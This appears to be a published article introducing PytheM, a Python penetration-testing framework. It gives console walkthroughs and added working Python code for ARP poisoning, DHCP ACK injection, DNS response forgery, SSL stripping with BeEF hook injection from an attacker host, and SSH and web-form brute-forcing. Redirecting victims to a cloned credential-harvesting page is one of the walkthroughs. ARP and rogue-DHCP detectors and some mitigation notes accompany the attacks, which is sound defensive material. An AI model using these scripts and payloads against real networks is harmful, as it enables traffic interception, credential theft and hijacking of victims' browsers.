PytheM: Penetration Testing Framework

PytheM is a Python multi-purpose pentest framework. It has been developed in the hope that it will be useful, and I don't take responsibility for any misapplication of it. It runs only on GNU/Linux.

Installation

$ sudo apt-get update
$ sudo apt-get install build-essential python-dev tcpdump python-capstone
$ sudo apt-get install libnetfilter-queue-dev libffi-dev libssl-dev
$ sudo git clone https://github.com/m4n3dw0lf/PytheM
$ cd PytheM
$ sudo pip install -r requirements.txt
Run with:
$ sudo ./pythem.py

Usage

ARP spoofing – Man-in-the-middle

pythem> set interface
[+] Enter the interface: wlan0
pythem> set gateway
[+] Enter the gateway: 192.168.1.1
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> sniff
[+] Enter the filter: core
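
What arpspoof start actually puts on the wire, and what a defender can look for, is easier to see with a small standalone script. The following is an added example written for this page, not PytheM's own code: it builds the two unsolicited ARP replies a man-in-the-middle keeps resending (target told "the gateway is at my MAC", gateway told "the target is at my MAC") and then runs an arpwatch-style check that flags any IP claimed by more than one MAC. The IPs follow the transcript; the MAC addresses are constructed.

```python
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806
ARP_REPLY = 2  # opcode "is-at"

# Constructed addresses for the walk-through (the IPs match the session above).
ATTACKER_MAC = "aa:bb:cc:dd:ee:ff"
TARGET_MAC, TARGET_IP = "11:22:33:44:55:66", "192.168.1.8"
GATEWAY_MAC, GATEWAY_IP = "00:11:22:33:44:55", "192.168.1.1"


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet + ARP 'is-at' frame (42 bytes) claiming sender_ip lives at sender_mac.
    Most stacks accept such unsolicited replies, which is what the poisoner relies on."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # htype, ptype, hlen, plen, op
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def poison_pair(attacker_mac, target_mac, target_ip, gateway_mac, gateway_ip):
    """The two frames a MITM resends every few seconds: the target is told the gateway
    is at attacker_mac, the gateway is told the target is at attacker_mac. With
    net.ipv4.ip_forward=1 on the attacker, both directions keep flowing through it."""
    return [
        build_arp_reply(attacker_mac, gateway_ip, target_mac, target_ip),
        build_arp_reply(attacker_mac, target_ip, gateway_mac, gateway_ip),
    ]


def parse_arp(frame):
    """Return the sender MAC/IP and opcode of an ARP frame, or None if it is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    op = struct.unpack("!H", frame[20:22])[0]
    sender_mac = ":".join("%02x" % b for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return {"op": op, "sender_mac": sender_mac, "sender_ip": sender_ip}


def detect_poisoning(frames):
    """arpwatch-style check: an IP claimed by more than one MAC within the capture
    window is the signature of a poisoner (a DHCP re-lease can look the same, so
    confirm before acting). Returns {ip: {macs}} for the conflicting IPs only."""
    seen = defaultdict(set)
    for frame in frames:
        p = parse_arp(frame)
        if p and p["op"] == ARP_REPLY:
            seen[p["sender_ip"]].add(p["sender_mac"])
    return {ip: macs for ip, macs in seen.items() if len(macs) > 1}


def demo():
    """One legitimate gateway reply followed by the attacker's pair."""
    legit = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, TARGET_MAC, TARGET_IP)
    spoofed = poison_pair(ATTACKER_MAC, TARGET_MAC, TARGET_IP, GATEWAY_MAC, GATEWAY_IP)
    return detect_poisoning([legit] + spoofed)
```

Sending the frames needs a raw socket (AF_PACKET, root), which is why the tool runs under sudo; the detector works on any ARP capture. Static ARP entries on the gateway and client, or Dynamic ARP Inspection on the switch, are what stops this in practice.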

ARP+DNS spoof – fake page redirect to credential harvester

  • Use SET or any other site cloner to clone the site of your choice and host it on apache2.
pythem> set target
[+] Enter the target(s): 192.168.0.8
pythem> set interface wlan0
pythem> set gateway 192.168.0.1
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[!] Type all to spoof all domains
[+] Domain to be spoofed: www.domainame.com
[+] Default address to redirect is:192.168.0.6 do you want to change?[y/n]n
[+] DNS spoofing initialized.
pythem> sniff core

Man-in-the-middle DHCP spoofing – DHCP ACK Injection

pythem> dhcpspoof start
[+] DHCP Server IP address: 192.168.1.1
[+] Broadcast address: 192.168.1.255
[+] Subnet mask: 255.255.255.0
[+] Router IP address: 192.168.1.1
[+] Domain: home
[+] DNS Server IP address: 192.168.1.4 (fake)
[+] DHCP spoofing initialized.
pythem> sniff core
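
The injected ACK carries the values the tool asks for above, with the DNS server pointed at the attacker. To show what that packet contains, and why the DNS option rather than the server identifier is the field to check, here is an added example (written for this page, not PytheM's code) that builds such an ACK and parses its options back. The addresses follow the transcript; the client MAC and transaction id are constructed.

```python
import struct

BOOTREPLY = 2
DHCPACK = 5
MAGIC = b"\x63\x82\x53\x63"


def ip(s):
    return bytes(int(x) for x in s.split("."))


def build_dhcp_ack(xid, client_mac, your_ip, server_ip, subnet, router, dns, domain,
                   broadcast, lease=86400):
    """BOOTP fixed fields (236 bytes) + magic cookie + DHCP option TLVs, op=BOOTREPLY."""
    hdr = struct.pack("!BBBBIHH", BOOTREPLY, 1, 6, 0, xid, 0, 0x8000)  # flags: broadcast
    hdr += ip("0.0.0.0") + ip(your_ip) + ip(server_ip) + ip("0.0.0.0")  # ciaddr yiaddr siaddr giaddr
    hdr += client_mac + b"\x00" * 10       # chaddr padded to 16 bytes
    hdr += b"\x00" * 64 + b"\x00" * 128    # sname, file
    opts = [
        (53, bytes([DHCPACK])),            # message type
        (54, ip(server_ip)),               # server identifier: the real server's IP
        (51, struct.pack("!I", lease)),    # lease time
        (1, ip(subnet)),
        (28, ip(broadcast)),
        (3, ip(router)),
        (6, ip(dns)),                      # the attacker's resolver
        (15, domain.encode()),
    ]
    body = b"".join(bytes([code, len(v)]) + v for code, v in opts) + b"\xff"
    return hdr + MAGIC + body


def parse_options(pkt):
    """Walk the option TLVs after the magic cookie; returns {code: raw value}."""
    if len(pkt) < 240 or pkt[236:240] != MAGIC:
        return {}
    out, i = {}, 240
    while i < len(pkt):
        code = pkt[i]
        if code == 0xFF:
            break
        if code == 0:          # pad
            i += 1
            continue
        ln = pkt[i + 1]
        out[code] = pkt[i + 2:i + 2 + ln]
        i += 2 + ln
    return out


def dotted(b):
    return ".".join(str(x) for x in b)


def check_ack(pkt, trusted_server, trusted_dns):
    """Rogue-DHCP check for an OFFER/ACK: the injected packet copies the legitimate
    server identifier, so only the DNS option gives it away."""
    o = parse_options(pkt)
    if o.get(53) not in (b"\x02", b"\x05"):
        return []
    findings = []
    if dotted(o.get(54, b"")) != trusted_server:
        findings.append("server id %s" % dotted(o.get(54, b"")))
    if dotted(o.get(6, b"")) != trusted_dns:
        findings.append("dns %s" % dotted(o.get(6, b"")))
    return findings


def demo():
    """The ACK from the session above, checked against the real DNS server."""
    pkt = build_dhcp_ack(0x3903F326, bytes.fromhex("112233445566"), "192.168.1.8",
                         "192.168.1.1", "255.255.255.0", "192.168.1.1", "192.168.1.4",
                         "home", "192.168.1.255")
    return check_ack(pkt, trusted_server="192.168.1.1", trusted_dns="192.168.1.1")
```

The attack wins by answering a client's DISCOVER/REQUEST before the real server does, so the defensive control is DHCP snooping on the switch (only the trusted port may send OFFER/ACK); the check above is what a monitor on a span port would do.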

Man-in-the-middle HSTS bypass – Strip SSL

pythem> set interface wlan0
pythem> set gateway 192.168.0.1
pythem> set target 192.168.0.8
pythem> hstsbypass
[*] SSLKill initialized
|_by: m4n3dw0lf
pythem> sniff core

Man-in-the-middle inject BeEF hook

  • Start the BeEF XSS framework and get the hook script URL.
pythem> set interface wlan0
pythem> set target 192.168.1.8
pythem> set gateway 192.168.1.1
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> inject start
[+] Enter the script source: http://192.168.1.6:3000/hook.js
[+] Script Injection initialized.
[+] Injection URL - http://192.168.1.6:80
[+] Script Injected on:  ('192.168.1.8', 34310)
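
Both hstsbypass and inject start work on the HTTP responses passing through the man-in-the-middle: the first strips Strict-Transport-Security and rewrites https:// references to http:// (the SSL strip idea), the second appends a script tag to HTML pages. The following added example, written for this page and not PytheM's or SSLKill's code, does both steps on a constructed response so the exact edits are visible, including the Content-Length fix that any rewriter must make. The hook URL is the one from the transcript.

```python
import re

HOOK_URL = "http://192.168.1.6:3000/hook.js"  # from the session above

# Constructed response from a fictional site, as a proxy would see it (identity encoding).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Strict-Transport-Security: max-age=31536000\r\n"
    b"Set-Cookie: sid=abc; Secure; HttpOnly\r\n"
    b"Content-Length: 67\r\n"
    b"\r\n"
    b'<html><body><a href="https://example.com/login">x</a></body></html>'
)


def split_response(raw):
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def join_response(status, headers, body):
    head = b"\r\n".join([status] + [n + b": " + v for n, v in headers])
    return head + b"\r\n\r\n" + body


def strip_ssl(status, headers, body):
    """sslstrip-style downgrade: drop the HSTS header, turn https:// into http:// in
    Location and in the body, and remove the Secure flag so cookies still flow in clear."""
    out = []
    for n, v in headers:
        ln = n.lower()
        if ln == b"strict-transport-security":
            continue
        if ln == b"location":
            v = v.replace(b"https://", b"http://")
        if ln == b"set-cookie":
            v = re.sub(rb";\s*secure", b"", v, flags=re.IGNORECASE)
        out.append((n, v))
    return status, out, body.replace(b"https://", b"http://")


def inject_script(status, headers, body, src):
    """Insert <script src=...> before </body> (or </head>); non-HTML is left alone."""
    ctype = dict((n.lower(), v) for n, v in headers).get(b"content-type", b"")
    if b"text/html" not in ctype.lower():
        return status, headers, body
    tag = b'<script src="' + src.encode() + b'"></script>'
    lowered = body.lower()  # ASCII-only lowering keeps offsets identical
    for marker in (b"</body>", b"</head>"):
        idx = lowered.rfind(marker)
        if idx != -1:
            return status, headers, body[:idx] + tag + body[idx:]
    return status, headers, body + tag


def fix_content_length(headers, body):
    """Any edit to the body invalidates Content-Length; recompute it last."""
    out = [(n, v) for n, v in headers if n.lower() != b"content-length"]
    out.append((b"Content-Length", str(len(body)).encode()))
    return out


def rewrite(raw, hook=HOOK_URL):
    status, headers, body = split_response(raw)
    status, headers, body = strip_ssl(status, headers, body)
    status, headers, body = inject_script(status, headers, body, hook)
    return join_response(status, fix_content_length(headers, body), body)
```

Two caveats a tester should keep in mind. The rewriter assumes an identity body: a real proxy removes Accept-Encoding from the request so it never has to unpack gzip or chunked responses. And stripping only works when the browser has not already got an HSTS entry for the site, whether cached from an earlier visit or preloaded; against those hosts the victim never sends the plaintext request the proxy is waiting for.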

SSH Brute-Force attack

pythem> service ssh start
pythem> set target 
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute-force ssh
[+] Enter the username to bruteforce: anon123

Web page form brute-force

  • First view the source of the login form and note the id= values of the username and password inputs.
  • The redirect result of each attempt is shown; if an attempt is redirected to a different page, the credentials may have been accepted.
pythem> set target http://127.0.0.1/
pythem> set file
[+] Enter the path to the file: wordlist.txt
pythem> brute-force webform
[+] Brute-Form authentication initialized.
[+] Enter the input id of the username box: vSIS_ID
[+] Enter the input id of the password box: vSIS_PASS
[+] Enter the username to brute-force the formulary: root
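
The success signal the tool relies on is the redirect: a wrong password re-serves the form, a right one sends the browser somewhere else. The following added example, written for this page and not PytheM's code, runs that loop against a local stand-in login handler so it can be executed offline. The field ids vSIS_ID and vSIS_PASS and the username root come from the transcript; the server, the valid password and the wordlist are constructed.

```python
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

USER_FIELD, PASS_FIELD = "vSIS_ID", "vSIS_PASS"      # input ids from the session above
WORDLIST = ["123456", "password", "letmein", "toor"]  # constructed stand-in for wordlist.txt


class LoginHandler(BaseHTTPRequestHandler):
    """Stand-in target: 302 to /home on the right password, the form again otherwise."""
    VALID = {"root": "toor"}  # constructed credential

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get(USER_FIELD, [""])[0]
        pwd = form.get(PASS_FIELD, [""])[0]
        if self.VALID.get(user) == pwd:
            self.send_response(302)
            self.send_header("Location", "/home")
            self.end_headers()
        else:
            body = b"<form>login failed</form>"
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: the Location header itself is the signal."""
    def redirect_request(self, *args, **kwargs):
        return None


def attempt(url, user, pwd):
    """POST one credential pair; return (status, Location) without following redirects."""
    data = urllib.parse.urlencode({USER_FIELD: user, PASS_FIELD: pwd}).encode()
    opener = urllib.request.build_opener(NoRedirect)
    try:
        resp = opener.open(url, data=data, timeout=5)
        return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as e:  # an unfollowed 3xx is raised as HTTPError
        return e.code, e.headers.get("Location")


def brute_webform(url, user, wordlist):
    """First (password, status, location) for which the server redirected; None otherwise.
    Treat a hit as a lead, not proof: some sites redirect on failure too, so compare the
    Location against what a known-bad attempt produces."""
    for pwd in wordlist:
        status, loc = attempt(url, user, pwd)
        if 300 <= status < 400 and loc:
            return pwd, status, loc
    return None


def run_demo():
    """Start the stand-in server on a free port, run the attack, shut it down."""
    srv = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        url = "http://127.0.0.1:%d/login" % srv.server_address[1]
        return brute_webform(url, "root", WORDLIST)
    finally:
        srv.shutdown()
```

Against a real form, rate limiting, account lockout and CSRF tokens that must be fetched fresh for every attempt are what make this loop fail; the redirect check also needs a baseline from a deliberately wrong password before any hit is trusted.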

URL content buster

pythem> set target
[+] Enter the target(s): http://testphp.vulnweb.com/index.php?id=
pythem> set file 1to100.txt
pythem> brute-force url
[+] Content URL bruter initialized.

Drop the DNS of a LAN range/IP address

Dropping DNS for the LAN can be useful in itself: an administrator who notices that name resolution has stopped may log in to the router's HTTP interface with their credentials to see what is happening, while the sniffer is running.

pythem> set interface wlan0
pythem> set gateway 192.168.1.1
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> dos dnsdrop
[+] Man-in-the-middle DNS drop initialized.
pythem> sniff core

Redirect all DNS queries to a host

Tip: start apache2 or any other web server hosting the HTML page you want every spoofed name to land on.

If the network's HTTP traffic passes through a proxy, add a rule that redirects the proxy port to port 80:

iptables -t nat -A PREROUTING -p tcp --dport PROXY_PORT -j REDIRECT --to-ports 80

pythem> set interface wlan0
pythem> set gateway 10.0.0.1
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[!] Type all to spoof all domains
[+] Domain to be spoofed: all
[+] Default address to redirect is:10.0.0.3 do you want to change?[y/n]n
[+] DNS spoofing initialized
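
Both dnsspoof sessions on this page (the single domain www.domainame.com redirected to 192.168.0.6 above, and "all" redirected to 10.0.0.3 here) come down to the same operation: the man-in-the-middle sees the client's query, so it knows the transaction id and the question, and answers first with an A record of its choosing. The following added example, written for this page and not PytheM's code, builds a query, decides whether it falls under the spoof list (a set of names, or {"all"}), and forges the matching response. The domains and addresses are the ones from the transcripts; the transaction id is constructed.

```python
import struct

QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode()
    return out + b"\x00"


def decode_name(data, offset):
    """Read a name (labels or a compression pointer); return (name, offset after it)."""
    labels = []
    while True:
        ln = data[offset]
        if ln == 0:
            offset += 1
            break
        if ln & 0xC0 == 0xC0:
            ptr = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            labels.append(decode_name(data, ptr)[0])
            offset += 2
            break
        labels.append(data[offset + 1:offset + 1 + ln].decode())
        offset += 1 + ln
    return ".".join(labels), offset


def build_query(name, qtype=QTYPE_A, txid=0x1234):
    """A client's standard recursive query (what the MITM observes)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(data):
    txid, flags, qd, _, _, _ = struct.unpack("!HHHHHH", data[:12])
    if flags & 0x8000 or qd != 1:   # a response, or not a single-question query
        return None
    name, off = decode_name(data, 12)
    qtype, qclass = struct.unpack("!HH", data[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": data[12:off + 4]}


def forge_response(query, spoof_ip, domains, ttl=300):
    """Forged answer for an A query whose name is in `domains` (or when domains is
    {"all"}); None means leave the packet alone. The txid and question are copied
    from the query, which is what makes the client accept the answer."""
    q = parse_query(query)
    if q is None or q["qtype"] != QTYPE_A or q["qclass"] != QCLASS_IN:
        return None
    if "all" not in domains and q["name"].lower() not in domains:
        return None
    header = struct.pack("!HHHHHH", q["txid"], 0x8180, 1, 1, 0, 0)  # QR, RD, RA set
    rr = struct.pack("!HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, ttl, 4)  # name -> pointer to question
    return header + q["question"] + rr + bytes(int(x) for x in spoof_ip.split("."))


def answer_ip(response):
    """Read the A record back out of a single-answer response (used to check the forgery)."""
    _, off = decode_name(response, 12)
    off += 4                                   # skip qtype, qclass
    _, off = decode_name(response, off)        # answer name (compression pointer)
    _, _, _, rdlen = struct.unpack("!HHIH", response[off:off + 10])
    return ".".join(str(b) for b in response[off + 10:off + 10 + rdlen])
```

In the tool the decision runs inside a netfilter queue hook (hence the libnetfilter-queue dependency): the real query is dropped and the forged reply is sent in its place, so there is no race with the genuine resolver. Only A queries are answered here; a client that also asks for AAAA may still reach the real host over IPv6, and a DNSSEC-validating or DNS-over-HTTPS client will reject or never expose the query in the first place.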

Source: Github
Source: securityonline

Anastasis Vasileiadis